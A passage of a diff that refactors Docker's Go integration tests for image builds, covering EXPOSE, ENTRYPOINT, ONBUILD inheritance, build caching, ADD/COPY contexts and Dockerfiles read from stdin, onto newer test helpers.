"Config.ExposedPorts") if res != expected { c.Fatalf("Exposed ports %s, expected %s", res, expected) @@ -2177,10 +1631,7 @@ func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) { tmpl.Execute(buf, portList) name := "testbuildexpose" - _, err := buildImage(name, buf.String(), true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(buf.String())) // check if all the ports are saved inside Config.ExposedPorts res := inspectFieldJSON(c, name, "Config.ExposedPorts") @@ -2205,11 +1656,8 @@ func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) { func (s *DockerSuite) TestBuildExposeOrder(c *check.C) { testRequires(c, 
DaemonIsLinux) // Expose not implemented on Windows buildID := func(name, exposed string) string { - _, err := buildImage(name, fmt.Sprintf(`FROM scratch - EXPOSE %s`, exposed), true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf(`FROM scratch + EXPOSE %s`, exposed))) id := inspectField(c, name, "Id") return id } @@ -2225,13 +1673,8 @@ func (s *DockerSuite) TestBuildExposeUpperCaseProto(c *check.C) { testRequires(c, DaemonIsLinux) // Expose not implemented on Windows name := "testbuildexposeuppercaseproto" expected := "map[5678/udp:{}]" - _, err := buildImage(name, - `FROM scratch - EXPOSE 5678/UDP`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM scratch + EXPOSE 5678/UDP`)) res := inspectField(c, name, "Config.ExposedPorts") if res != expected { c.Fatalf("Exposed ports %s, expected %s", res, expected) @@ -2242,13 +1685,8 @@ func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) { name := "testbuildentrypointinheritance" name2 := "testbuildentrypointinheritance2" - _, err := buildImage(name, - `FROM busybox - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ENTRYPOINT ["/bin/echo"]`)) res := inspectField(c, name, "Config.Entrypoint") expected := "[/bin/echo]" @@ -2256,34 +1694,23 @@ func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) { c.Fatalf("Entrypoint %s, expected %s", res, expected) } - _, err = buildImage(name2, - fmt.Sprintf(`FROM %s - ENTRYPOINT []`, name), - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name2, build.WithDockerfile(fmt.Sprintf(`FROM %s + ENTRYPOINT []`, name))) res = inspectField(c, name2, "Config.Entrypoint") expected = "[]" - if res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) } - } func (s *DockerSuite) TestBuildEmptyEntrypoint(c *check.C) { name := 
"testbuildentrypoint" expected := "[]" - _, err := buildImage(name, - `FROM busybox - ENTRYPOINT []`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + ENTRYPOINT []`)) + res := inspectField(c, name, "Config.Entrypoint") if res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) @@ -2295,13 +1722,9 @@ func (s *DockerSuite) TestBuildEntrypoint(c *check.C) { name := "testbuildentrypoint" expected := "[/bin/echo]" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`)) + res := inspectField(c, name, "Config.Entrypoint") if res != expected { c.Fatalf("Entrypoint %s, expected %s", res, expected) @@ -2310,282 +1733,131 @@ func (s *DockerSuite) TestBuildEntrypoint(c *check.C) { } // #6445 ensure ONBUILD triggers aren't committed to grandchildren -func (s *DockerSuite) TestBuildOnBuildLimitedInheritence(c *check.C) { - var ( - out2, out3 string - ) - { - name1 := "testonbuildtrigger1" - dockerfile1 := ` +func (s *DockerSuite) TestBuildOnBuildLimitedInheritance(c *check.C) { + buildImageSuccessfully(c, "testonbuildtrigger1", build.WithDockerfile(` FROM busybox RUN echo "GRANDPARENT" ONBUILD RUN echo "ONBUILD PARENT" - ` - ctx, err := fakeContext(dockerfile1, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out1, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name1, ".") - if err != nil { - c.Fatalf("build failed to complete: %s, %v", out1, err) - } - } - { - name2 := "testonbuildtrigger2" - dockerfile2 := ` - FROM testonbuildtrigger1 - ` - ctx, err := fakeContext(dockerfile2, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out2, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name2, ".") - if err != nil { - c.Fatalf("build failed to complete: %s, %v", out2, err) 
- } - } - { - name3 := "testonbuildtrigger3" - dockerfile3 := ` - FROM testonbuildtrigger2 - ` - ctx, err := fakeContext(dockerfile3, nil) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - out3, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name3, ".") - if err != nil { - c.Fatalf("build failed to complete: %s, %v", out3, err) - } - - } - + `)) // ONBUILD should be run in second build. - if !strings.Contains(out2, "ONBUILD PARENT") { - c.Fatalf("ONBUILD instruction did not run in child of ONBUILD parent") - } - + buildImage("testonbuildtrigger2", build.WithDockerfile("FROM testonbuildtrigger1")).Assert(c, icmd.Expected{ + Out: "ONBUILD PARENT", + }) // ONBUILD should *not* be run in third build. - if strings.Contains(out3, "ONBUILD PARENT") { + result := buildImage("testonbuildtrigger3", build.WithDockerfile("FROM testonbuildtrigger2")) + result.Assert(c, icmd.Success) + if strings.Contains(result.Combined(), "ONBUILD PARENT") { c.Fatalf("ONBUILD instruction ran in grandchild of ONBUILD parent") } - } -func (s *DockerSuite) TestBuildWithCache(c *check.C) { +func (s *DockerSuite) TestBuildSameDockerfileWithAndWithoutCache(c *check.C) { testRequires(c, DaemonIsLinux) // Expose not implemented on Windows name := "testbuildwithcache" - id1, err := buildImage(name, - `FROM scratch - MAINTAINER dockerio - EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImage(name, - `FROM scratch + dockerfile := `FROM scratch MAINTAINER dockerio EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } + ENTRYPOINT ["/bin/echo"]` + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithDockerfile(dockerfile)) + id2 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + id3 := getIDByName(c, name) if id1 != id2 { c.Fatal("The cache should have been 
used but hasn't.") } -} - -func (s *DockerSuite) TestBuildWithoutCache(c *check.C) { - testRequires(c, DaemonIsLinux) // Expose not implemented on Windows - name := "testbuildwithoutcache" - name2 := "testbuildwithoutcache2" - id1, err := buildImage(name, - `FROM scratch - MAINTAINER dockerio - EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - true) - if err != nil { - c.Fatal(err) - } - - id2, err := buildImage(name2, - `FROM scratch - MAINTAINER dockerio - EXPOSE 5432 - ENTRYPOINT ["/bin/echo"]`, - false) - if err != nil { - c.Fatal(err) - } - if id1 == id2 { + if id1 == id3 { c.Fatal("The cache should have been invalided but hasn't.") } } +// Make sure that ADD/COPY still populate the cache even if they don't use it func (s *DockerSuite) TestBuildConditionalCache(c *check.C) { name := "testbuildconditionalcache" dockerfile := ` FROM busybox ADD foo /tmp/` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "hello", + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatalf("Error building #1: %s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) if err := ctx.Add("foo", "bye"); err != nil { c.Fatalf("Error modifying foo: %s", err) } - id2, err := buildImageFromContext(name, ctx, false) - if err != nil { - c.Fatalf("Error building #2: %s", err) - } + // Updating a file should invalidate the cache + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id2 == id1 { c.Fatal("Should not have used the cache") } - id3, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatalf("Error building #3: %s", err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name) if id3 != id2 { c.Fatal("Should have 
used the cache") } } -func (s *DockerSuite) TestBuildAddLocalFileWithCache(c *check.C) { - // local files are not owned by the correct user - testRequires(c, NotUserNamespace) - name := "testbuildaddlocalfilewithcache" - name2 := "testbuildaddlocalfilewithcache2" - dockerfile := ` +func (s *DockerSuite) TestBuildAddMultipleLocalFileWithAndWithoutCache(c *check.C) { + name := "testbuildaddmultiplelocalfilewithcache" + baseName := name + "-base" + + cli.BuildCmd(c, baseName, build.WithDockerfile(` FROM busybox + ENTRYPOINT ["/bin/sh"] + `)) + + dockerfile := ` + FROM testbuildaddmultiplelocalfilewithcache-base MAINTAINER dockerio - ADD foo /usr/lib/bla/bar - RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` - ctx, err := fakeContext(dockerfile, map[string]string{ + ADD foo Dockerfile /usr/lib/bla/ + RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + result2 := cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) + result3 := cli.BuildCmd(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name) if id1 != id2 { - c.Fatal("The cache should have been used but hasn't.") + c.Fatalf("The cache should have been used but hasn't: %s", result2.Stdout()) + } + if id1 == id3 { + c.Fatalf("The cache should have been invalided but hasn't: %s", result3.Stdout()) } } -func (s *DockerSuite) TestBuildAddMultipleLocalFileWithCache(c *check.C) { - name := "testbuildaddmultiplelocalfilewithcache" - name2 := "testbuildaddmultiplelocalfilewithcache2" - 
dockerfile := ` - FROM busybox - MAINTAINER dockerio - ADD foo Dockerfile /usr/lib/bla/ - RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } - if id1 != id2 { - c.Fatal("The cache should have been used but hasn't.") - } -} - -func (s *DockerSuite) TestBuildAddLocalFileWithoutCache(c *check.C) { - // local files are not owned by the correct user - testRequires(c, NotUserNamespace) - name := "testbuildaddlocalfilewithoutcache" - name2 := "testbuildaddlocalfilewithoutcache2" - dockerfile := ` - FROM busybox - MAINTAINER dockerio - ADD foo /usr/lib/bla/bar - RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` - ctx, err := fakeContext(dockerfile, map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, false) - if err != nil { - c.Fatal(err) - } - if id1 == id2 { - c.Fatal("The cache should have been invalided but hasn't.") - } -} - -func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) { - name := "testbuildcopydirbutnotfile" - name2 := "testbuildcopydirbutnotfile2" - +func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) { + name := "testbuildcopydirbutnotfile" + name2 := "testbuildcopydirbutnotfile2" + dockerfile := ` FROM ` + minimalBaseImage() + ` COPY dir /tmp/` - ctx, err := fakeContext(dockerfile, map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "dir/foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, 
true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Check that adding file with similar name doesn't mess with cache if err := ctx.Add("dir_file", "hello2"); err != nil { c.Fatal(err) } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name2, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name2) if id1 != id2 { c.Fatal("The cache should have been used but wasn't") } @@ -2600,25 +1872,18 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { FROM ` + minimalBaseImage() + ` MAINTAINER dockerio ADD . /usr/lib/bla` - ctx, err := fakeContext(dockerfile, map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) // Check that adding file invalidate cache of "ADD ." 
if err := ctx.Add("bar", "hello2"); err != nil { c.Fatal(err) } - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name2, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name2) if id1 == id2 { c.Fatal("The cache should have been invalided but hasn't.") } @@ -2626,10 +1891,8 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { if err := ctx.Add("foo", "hello1"); err != nil { c.Fatal(err) } - id3, err := buildImageFromContext(name3, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name3, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name3) if id2 == id3 { c.Fatal("The cache should have been invalided but hasn't.") } @@ -2639,101 +1902,54 @@ func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { if err := ctx.Add("foo", "hello1"); err != nil { c.Fatal(err) } - id4, err := buildImageFromContext(name4, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name4, build.WithExternalBuildContext(ctx)) + id4 := getIDByName(c, name4) if id3 != id4 { c.Fatal("The cache should have been used but hasn't.") } } +// FIXME(vdemeester) this really seems to test the same thing as before (TestBuildAddMultipleLocalFileWithAndWithoutCache) func (s *DockerSuite) TestBuildAddCurrentDirWithoutCache(c *check.C) { name := "testbuildaddcurrentdirwithoutcache" - name2 := "testbuildaddcurrentdirwithoutcache2" dockerfile := ` FROM ` + minimalBaseImage() + ` MAINTAINER dockerio ADD . 
/usr/lib/bla` - ctx, err := fakeContext(dockerfile, map[string]string{ + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile), fakecontext.WithFiles(map[string]string{ "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name2, ctx, false) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) if id1 == id2 { c.Fatal("The cache should have been invalided but hasn't.") } } -func (s *DockerSuite) TestBuildAddRemoteFileWithCache(c *check.C) { +func (s *DockerSuite) TestBuildAddRemoteFileWithAndWithoutCache(c *check.C) { name := "testbuildaddremotefilewithcache" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "baz": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - id1, err := buildImage(name, - fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImage(name, - fmt.Sprintf(`FROM `+minimalBaseImage()+` + dockerfile := fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } + ADD %s/baz /usr/lib/baz/quux`, server.URL()) + cli.BuildCmd(c, name, build.WithDockerfile(dockerfile)) + id1 := getIDByName(c, name) + cli.BuildCmd(c, name, build.WithDockerfile(dockerfile)) + id2 := getIDByName(c, name) + cli.BuildCmd(c, name, build.WithoutCache, build.WithDockerfile(dockerfile)) + id3 := getIDByName(c, name) + if id1 != id2 { c.Fatal("The cache should have been used but hasn't.") } -} - -func 
(s *DockerSuite) TestBuildAddRemoteFileWithoutCache(c *check.C) { - name := "testbuildaddremotefilewithoutcache" - name2 := "testbuildaddremotefilewithoutcache2" - server, err := fakeStorage(map[string]string{ - "baz": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer server.Close() - - id1, err := buildImage(name, - fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImage(name2, - fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - false) - if err != nil { - c.Fatal(err) - } - if id1 == id2 { + if id1 == id3 { c.Fatal("The cache should have been invalided but hasn't.") } } @@ -2744,29 +1960,18 @@ func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) { name3 := name + "3" files := map[string]string{"baz": "hello"} - server, err := fakeStorage(files) - if err != nil { - c.Fatal(err) - } + server := fakestorage.New(c, "", fakecontext.WithFiles(files)) defer server.Close() - ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server.URL()), nil) - if err != nil { - c.Fatal(err) - } + ADD %s/baz /usr/lib/baz/quux`, server.URL()))) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - - id2, err := buildImageFromContext(name2, ctx, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + cli.BuildCmd(c, name2, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name2) if id1 != id2 { c.Fatal("The cache should have been used but wasn't - #1") } @@ -2777,86 +1982,67 @@ func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) { // allow some time for clock to pass 
as mtime precision is only 1s time.Sleep(2 * time.Second) - server2, err := fakeStorage(files) - if err != nil { - c.Fatal(err) - } + server2 := fakestorage.New(c, "", fakecontext.WithFiles(files)) defer server2.Close() - ctx2, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + ctx2 := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio - ADD %s/baz /usr/lib/baz/quux`, server2.URL()), nil) - if err != nil { - c.Fatal(err) - } + ADD %s/baz /usr/lib/baz/quux`, server2.URL()))) defer ctx2.Close() - id3, err := buildImageFromContext(name3, ctx2, true) - if err != nil { - c.Fatal(err) - } + cli.BuildCmd(c, name3, build.WithExternalBuildContext(ctx2)) + id3 := getIDByName(c, name3) if id1 != id3 { c.Fatal("The cache should have been used but wasn't") } } -func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithCache(c *check.C) { +// FIXME(vdemeester) this really seems to test the same thing as before (combined) +func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithAndWithoutCache(c *check.C) { name := "testbuildaddlocalandremotefilewithcache" - server, err := fakeStorage(map[string]string{ + server := fakestorage.New(c, "", fakecontext.WithFiles(map[string]string{ "baz": "hello", - }) - if err != nil { - c.Fatal(err) - } + })) defer server.Close() - ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(`FROM `+minimalBaseImage()+` MAINTAINER dockerio ADD foo /usr/lib/bla/bar - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - map[string]string{ + ADD %s/baz /usr/lib/baz/quux`, server.URL())), + fakecontext.WithFiles(map[string]string{ "foo": "hello world", - }) - if err != nil { - c.Fatal(err) - } + })) defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } - id2, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + 
buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, name) + buildImageSuccessfully(c, name, build.WithoutCache, build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, name) if id1 != id2 { c.Fatal("The cache should have been used but hasn't.") } + if id1 == id3 { + c.Fatal("The cache should have been invalidated but hasn't.") + } } func testContextTar(c *check.C, compression archive.Compression) { - ctx, err := fakeContext( - `FROM busybox + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(`FROM busybox ADD foo /foo -CMD ["cat", "/foo"]`, - map[string]string{ +CMD ["cat", "/foo"]`), + fakecontext.WithFiles(map[string]string{ "foo": "bar", - }, + }), ) - if err != nil { - c.Fatal(err) - } defer ctx.Close() context, err := archive.Tar(ctx.Dir, compression) if err != nil { c.Fatalf("failed to build context tar: %v", err) } name := "contexttar" - buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") - buildCmd.Stdin = context - if out, _, err := runCommandWithOutput(buildCmd); err != nil { - c.Fatalf("build failed to complete: %v %v", out, err) - } + cli.BuildCmd(c, name, build.WithStdinContext(context)) } func (s *DockerSuite) TestBuildContextTarGzip(c *check.C) { @@ -2868,53 +2054,99 @@ func (s *DockerSuite) TestBuildContextTarNoCompression(c *check.C) { } func (s *DockerSuite) TestBuildNoContext(c *check.C) { - buildCmd := exec.Command(dockerBinary, "build", "-t", "nocontext", "-") - buildCmd.Stdin = strings.NewReader( - `FROM busybox - CMD ["echo", "ok"]`) - - if out, _, err := runCommandWithOutput(buildCmd); err != nil { - c.Fatalf("build failed to complete: %v %v", out, err) - } + name := "nocontext" + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-"}, + Stdin: strings.NewReader( + `FROM busybox + CMD ["echo", "ok"]`), + }).Assert(c, icmd.Success) if out, _ := 
dockerCmd(c, "run", "--rm", "nocontext"); out != "ok\n" { c.Fatalf("run produced invalid output: %q, expected %q", out, "ok") } } -// TODO: TestCaching -func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithoutCache(c *check.C) { - name := "testbuildaddlocalandremotefilewithoutcache" - name2 := "testbuildaddlocalandremotefilewithoutcache2" - server, err := fakeStorage(map[string]string{ - "baz": "hello", +// FIXME(vdemeester) migrate to docker/cli e2e +func (s *DockerSuite) TestBuildDockerfileStdin(c *check.C) { + name := "stdindockerfile" + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + err = ioutil.WriteFile(filepath.Join(tmpDir, "foo"), []byte("bar"), 0600) + c.Assert(err, check.IsNil) + + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-f", "-", tmpDir}, + Stdin: strings.NewReader( + `FROM busybox +ADD foo /foo +CMD ["cat", "/foo"]`), + }).Assert(c, icmd.Success) + + res := inspectField(c, name, "Config.Cmd") + c.Assert(strings.TrimSpace(string(res)), checker.Equals, `[cat /foo]`) +} + +// FIXME(vdemeester) migrate to docker/cli tests (unit or e2e) +func (s *DockerSuite) TestBuildDockerfileStdinConflict(c *check.C) { + name := "stdindockerfiletarcontext" + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-f", "-", "-"}, + }).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "use stdin for both build context and dockerfile", }) - if err != nil { - c.Fatal(err) - } - defer server.Close() +} - ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` - MAINTAINER dockerio - ADD foo /usr/lib/bla/bar - ADD %s/baz /usr/lib/baz/quux`, server.URL()), - map[string]string{ - "foo": "hello world", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - id1, err := buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) +func (s *DockerSuite) TestBuildDockerfileStdinNoExtraFiles(c *check.C) { + s.testBuildDockerfileStdinNoExtraFiles(c, false, false) 
+} + +func (s *DockerSuite) TestBuildDockerfileStdinDockerignore(c *check.C) { + s.testBuildDockerfileStdinNoExtraFiles(c, true, false) +} + +func (s *DockerSuite) TestBuildDockerfileStdinDockerignoreIgnored(c *check.C) { + s.testBuildDockerfileStdinNoExtraFiles(c, true, true) +} + +func (s *DockerSuite) testBuildDockerfileStdinNoExtraFiles(c *check.C, hasDockerignore, ignoreDockerignore bool) { + name := "stdindockerfilenoextra" + tmpDir, err := ioutil.TempDir("", "fake-context") + c.Assert(err, check.IsNil) + defer os.RemoveAll(tmpDir) + + writeFile := func(filename, content string) { + err = ioutil.WriteFile(filepath.Join(tmpDir, filename), []byte(content), 0600) + c.Assert(err, check.IsNil) } - id2, err := buildImageFromContext(name2, ctx, false) - if err != nil { - c.Fatal(err) + + writeFile("foo", "bar") + + if hasDockerignore { + // Add an empty Dockerfile to verify that it is not added to the image + writeFile("Dockerfile", "") + + ignores := "Dockerfile\n" + if ignoreDockerignore { + ignores += ".dockerignore\n" + } + writeFile(".dockerignore", ignores) } - if id1 == id2 { - c.Fatal("The cache should have been invalidated but hasn't.") + + result := icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "build", "-t", name, "-f", "-", tmpDir}, + Stdin: strings.NewReader( + `FROM busybox +COPY . 
/baz`), + }) + result.Assert(c, icmd.Success) + + result = cli.DockerCmd(c, "run", "--rm", name, "ls", "-A", "/baz") + if hasDockerignore && !ignoreDockerignore { + c.Assert(result.Stdout(), checker.Equals, ".dockerignore\nfoo\n") + } else { + c.Assert(result.Stdout(), checker.Equals, "foo\n") } } @@ -2922,22 +2154,14 @@ func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildimg" - _, err := buildImage(name, - `FROM busybox:latest + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox:latest RUN mkdir /test && chown daemon:daemon /test && chmod 0600 /test - VOLUME /test`, - true) - - if err != nil { - c.Fatal(err) - } + VOLUME /test`)) out, _ := dockerCmd(c, "run", "--rm", "testbuildimg", "ls", "-la", "/test") - if expected := "drw-------"; !strings.Contains(out, expected) { c.Fatalf("expected %s received %s", expected, out) } - if expected := "daemon daemon"; !strings.Contains(out, expected) { c.Fatalf("expected %s received %s", expected, out) } @@ -2948,27 +2172,16 @@ func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) { // utilizing cache func (s *DockerSuite) TestBuildEntrypointRunCleanup(c *check.C) { name := "testbuildcmdcleanup" - if _, err := buildImage(name, - `FROM busybox - RUN echo "hello"`, - true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox + RUN echo "hello"`)) - ctx, err := fakeContext(`FROM busybox + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox RUN echo "hello" ADD foo /foo - ENTRYPOINT ["/bin/echo"]`, - map[string]string{ - "foo": "hello", - }) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + ENTRYPOINT ["/bin/echo"]`), + build.WithFile("foo", "hello"))) + res := inspectField(c, name, "Config.Cmd") // Cmd must be cleaned up if res != "[]" { @@ -2980,46 
+2193,29 @@ func (s *DockerSuite) TestBuildAddFileNotFound(c *check.C) { name := "testbuildaddnotfound" expected := "foo: no such file or directory" - if daemonPlatform == "windows" { + if testEnv.OSType == "windows" { expected = "foo: The system cannot find the file specified" } - ctx, err := fakeContext(`FROM `+minimalBaseImage()+` - ADD foo /usr/local/bar`, - map[string]string{"bar": "hello"}) - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - if !strings.Contains(err.Error(), expected) { - c.Fatalf("Wrong error %v, must be about missing foo file or directory", err) - } - } else { - c.Fatal("Error must not be nil") - } + buildImage(name, build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM `+minimalBaseImage()+` + ADD foo /usr/local/bar`), + build.WithFile("bar", "hello"))).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: expected, + }) } func (s *DockerSuite) TestBuildInheritance(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildinheritance" - _, err := buildImage(name, - `FROM scratch - EXPOSE 2375`, - true) - if err != nil { - c.Fatal(err) - } + 